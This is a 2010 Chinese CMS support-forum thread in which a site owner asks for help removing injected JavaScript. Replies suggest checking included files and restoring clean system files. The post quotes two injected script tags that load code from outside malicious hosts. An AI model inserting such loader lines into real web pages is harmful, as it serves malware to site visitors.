当前位置:
|
主题:[求助]被挂马,有一段JS代码删不了 [收藏主题] | 转到: |
 wzy20071130 发表于:2010/11/10 11:39:00 | 只看该作者 查看该作者主题
11楼  <script language="javascript" src="http://32w.conna.dtdns.net/asd.js?s=201&col=ffdd00"></script>');document.writeln('<script language="javascript" src="http://32w.office.1s.fr/office.js?google_ad_format=728x90_as"></script> 这也不是GOOGLE 因为360老提示有毒 |
|
 支持(4) |  反对(3)
 顶端  底部
|
![电子邮件:[ 626383757@qq.com ]](http://bbs.kesion.com/club/images/email.gif){kind=small}
|
wzy20071130 发表于:2010/11/10 15:46:00 | 只看该作者 查看该作者主题
12楼 |
|
|
支持(4) | 反对(4)
顶端 底部
|
|
wzy20071130 发表于:2010/11/17 8:13:00 | 只看该作者 查看该作者主题
13楼 |
|
|
支持(1) | 反对(1)
顶端 底部
|
|
wzy20071130 发表于:2010/11/17 9:19:00 | 只看该作者 查看该作者主题
14楼 |
|
|
支持(1) | 反对(1)
顶端 底部
|
 兰州先到ShowArticle.asp瞅瞅看include了什么文件,然后在include的文件里查找带有<script language="javascript" src="http://32w.conna.dtdns.net/asd.js?s=201&col=ffdd00"></script>'这一行清除,就是清除这个脚本
|
|
|
支持(1) | 反对(1)
顶端 底部
|
|
支持(1) | 反对(1)
顶端 底部
|
|
wzy20071130 发表于:2010/11/22 9:05:00 | 只看该作者 查看该作者主题
17楼 |
|
|
支持(0) | 反对(0)
顶端 底部
|
|
以下是引用 wzy20071130在2010-11-10 9:24:00的发言: 以下是引用 我本寂寞在2010-11-10 9:21:00的发言: 这是我清除了后还剩下的删不了的。 这个是不用删的,KS_inc/ajax.js原本就是系统里面的,至于你贴出来的其他JS文件,也就是你所说的马,你可以先把你所有的模板文件down下来,看看有没有,然后如果你怀疑在你的ks_inc目录被人攻击了的话,就找个干净系统里面的ks_inc覆盖之(自己做了修改的文件注意备份),然后清除缓存,最后重建所有(有马页面)。 另外我想问的是1、你用的科讯什么版本? 2、科讯程序有漏洞?服务器漏洞?跨站? 麻烦楼主问问题详细一点 |
|
|
支持(0) | 反对(0)
顶端 底部
|
|
支持(0) | 反对(0)
顶端 底部
|
| <上一主题 | 下一主题 > |